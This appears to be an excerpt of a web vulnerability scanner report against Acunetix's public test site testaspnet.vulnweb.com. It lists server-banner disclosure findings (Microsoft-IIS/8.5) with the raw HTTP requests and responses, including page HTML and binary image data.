<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/favicon.ico
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 367 bytes.	GET http://testaspnet.vulnweb.com/favicon.ico HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc
Request Body - size: 0 bytes.
Response Header - size: 249 bytes.	HTTP/1.1 200 OK Content-Type: image/x-icon Last-Modified: Thu, 29 May 2008 14:36:35 GMT Accept-Ranges: bytes ETag: "184366599c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:25 GMT Content-Length: 894
Response Body - size: 894 bytes.	h( HHÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿïîý\Uêà&ãÝÛûóóýñ¥ ôõôþäãü@6æàmeìøøþÍÊùààáÖÔú³¯õßàª¦ôÔÒù'ãàãÈÅùÐÍùâáá×Õú²®õ àá©ôÕÓú'äá&äÅÂùäãü3)åáàðêèüðòìëýðààE<éòñþüüÿò à áác[ëÖÔúØÕú_Wë à á à°¬õÿÿÿÿÿÿðïý90æ à ááááá áà>4çõõþÿÿÿÿÿÿÿÿÿÑÎù:2æààááàà:0æÎÌùÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÝÜûðZRê&ã)äVNêòÚØúÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿþþÿñðýäãüâáûðïýþþÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
URL	http://testaspnet.vulnweb.com/images/background.gif
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 387 bytes.	GET http://testaspnet.vulnweb.com/images/background.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/styles.css Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:54 GMT Accept-Ranges: bytes ETag: "9a66e17099c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:25 GMT Content-Length: 144
Response Body - size: 144 bytes.	GIF89a³ÿÿÿ×Ê¹uSxVÍÀº©æÜÏÀ°¢p§v!ù,=0¸8ëÍ»ÿ`(dihª®lë¾p,Ïtmßx®ï¼' BÀ8$½¤rÉl:Ð¨tJZ¯²Aâ0;
URL	http://testaspnet.vulnweb.com/images/comment-after.gif
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 355 bytes.	GET http://testaspnet.vulnweb.com/images/comment-after.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "2c6507199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 1957
Response Body - size: 1,957 bytes.	GIF89aôÕÿÿÿ`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâóìçòìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìù÷õöñìõðëùøõïèâøõñù÷öðéãíäÝ÷õñõñëûûùëâÙøõðùøöîäÝðèãîäÞéÞÕæÚÏíäÞéßÔûúùçÜÒ÷õðöðëçÛÑïéãëáÙëâØçÜÑ!ù,ôÿÀ@Å0 C¢eXDNÅ0}§I¤ôIµ É¨IT>§Çf¶ÕU¢¸\ñ~+Í£Ö¿Öc't^PZYPCKMherF^Nv[Zbxr_\H2fci`¤MY\yUnGhO'VTl{kL[·Wz¬¤T¸dicL¡«¹eT'¹¨}}cLeyR»ÝiÚHâ¼Õr{CªTuËD " ð§@ }þâã°¯à@!PHA½ ª(ÈñGâë80#È@âË1ä~ø~tÒa@cÜ³ ÿ?\|\9r"Ã8#ò<HSâ½0Ê<ÀS2âÏ:ïuÉ¦{â«3#ÐoêÄ¹vßØýIMê!ÚpGÆäHpèI½&(§B·/Ø/oÛ»-ê¬ùç³zµNTêsÑU¤T+kÀ>ÿ%u©àêè«%vÝºé\ è-!(Ç@óæ/Àb¸óä'WN`Áqï$xçÎÝz÷æÒ½/¿~½óñ!ÔcÞ]ùðöâíw¿<}õá·@\|ï]tÓé·wÙÞÖ%Gà~¤À_vöWyåÙÇÿxnÈ¡Ú½ &ÞWñ©HsNG ¢`v8]ÇagÈm(ÞxÛgÞ.vGcw ÞÞN6Bsæ59¢u¨ÓmÇvOòG$!>6Jø¤Vè ÎAWßc¾ér¤g}ê¹GÊ@j(n`è¢"Z¨£2zh¤lÐ(¥ à(¢P V ª¢ àÁ£¤ Ð©¦> )£Bðª¬®bJ«£Æz(¨"zjªFJë¤²v°ºé¢\ª)±Úè«z`)«ª:;ë©Ø P®· [êµÖpê±v:ÿì²âB@n¯Ý.ún¥Ýþo¦ÃÊêÁ´ÏÚï¡ÎvÊ-·¤",µ¬Z+ªB+î¿v ì©p°ýrªª >à@²Ç DÁ 4ðqÈ&G2Ê0; sÐ\|2Í!¯ü±¸òÉ${\sÉ&2È¯\rÍ(\|³Ì<Ë¬²Ð2,´É(\4ÏGGÝsÖE'òÔ]m2Ï-{ýsÓI{ítÌ?kÍsÏ./}4ÍLÓ}rÕã,wÖc¿uÊs×\õÇ k=¶Ç=/M3ÑFs]³ÏN'ÎôÌ=K=òØJ¿,5Ì)û\|òÈ>®óÛ3#½sæ.ÍxèCK]¸ì6¿>ÿ2â·5Ø"çùÍD³8Ö\ßMrñ6ã4Ú8yÎ-OsãxCÝúÒ9gï5Ç0\|?Þ~øãÏ@æþ÷°/>øò£úð¯o~ùÞ£ÿÿüß÷È÷>óáO\|üc0ÈoLÿ8?F0\| ìðyðõÛß÷H?V°ôà ý§Bï±/üúX ? ^0tßûØBê/¬¡pÞì ;?!Öð´!ÿFpD"±$_ yÈÁþmò{áÈ?& P}¡o¨Dï <8Ãæÿõã HÀü8 ü1-(@ ?þ\|d9I@úqt¤#% HN.R$#)Iò$(¹IEle IÉJþÀ þ¨IEÒÒ¶4dvIËT:2\eILRLd)Jj>ó&%IyÌJ2©ü¥/ÅùÈVÆ2üc3yËcÀÎ´%*·ÍQ¤´¥3yyMEjSéÌä2½¹OWjð<e:}II~ §.]ùÍ[º²¦¬e.CIH`N²Ë4¤HÑYÈ.¤³lh IªÊ\6ÂòL=öHSÒã¦8Í©NwÊÓúô§@ ªPJÔ¢õ¨HMªRÊÔ¦:õ©PêRQ (xjM·ÊÕ®zõ«` «XÇJÖ²õ¬hM«Z×ÊÖ¶ºõp«\çJ×®ÀxAfZ×¾úõ¯ ¬`KØÂö°kf0Ø@¬d'KÙÊZö²ÍìVððU³ hGKÚÒÖ¯ìiWËÚÖºöµ°ìgcKÛÚÚö¶¸ujû;
URL	http://testaspnet.vulnweb.com/images/comment-before.gif
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 356 bytes.	GET http://testaspnet.vulnweb.com/images/comment-before.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
